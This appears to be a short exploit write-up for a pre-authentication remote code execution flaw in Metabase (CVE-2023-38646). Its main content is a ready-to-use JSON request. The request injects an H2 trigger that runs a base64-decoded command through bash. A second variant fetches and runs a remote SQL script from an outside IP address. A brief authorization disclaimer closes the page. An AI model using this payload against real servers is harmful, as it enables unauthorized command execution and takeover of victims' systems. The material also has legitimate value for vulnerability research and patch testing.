Metabase postgres (org.h2.Driver) RCE without INIT### Extension of the Pre-Auth RCE in Metabase (CVE-2023-38646) explained [here](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/)
This helped me to avoid errors related to "database already in use" (with H2 and postgre as engines)
```json
{
"token": "TOKEN",
"details":
{
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules":{},
"details":
{
"advanced-options":true,
"classname":"org.h2.Driver",
"subname": "./metabase.jar;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER xel BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,BASE64COMMAND}|{base64,-d}|{bash,-i}')\n$$--=x",
"subprotocol": "h2"
},
"engine": "postgres",
"name": "x"
}}
```
Instead of using directly h2 as engine with the INIT script, since its removed from our queries, we still using the db query for h2 engine
<details>
<summary>INIT script</summary>
<code>mem;test;INIT=RUNSCRIPT FROM 'http://10.10.10.10/sqlcmd.sql'</code>
<h3>In the .sql you specify the way to exec shell commands</h3>
</details>
# REFERENCE
https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase
### Written as a note, take it as vague documentation, you must have authorization to enumerate, exploit or simply test against any target
## Comments and contributions are welcome
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view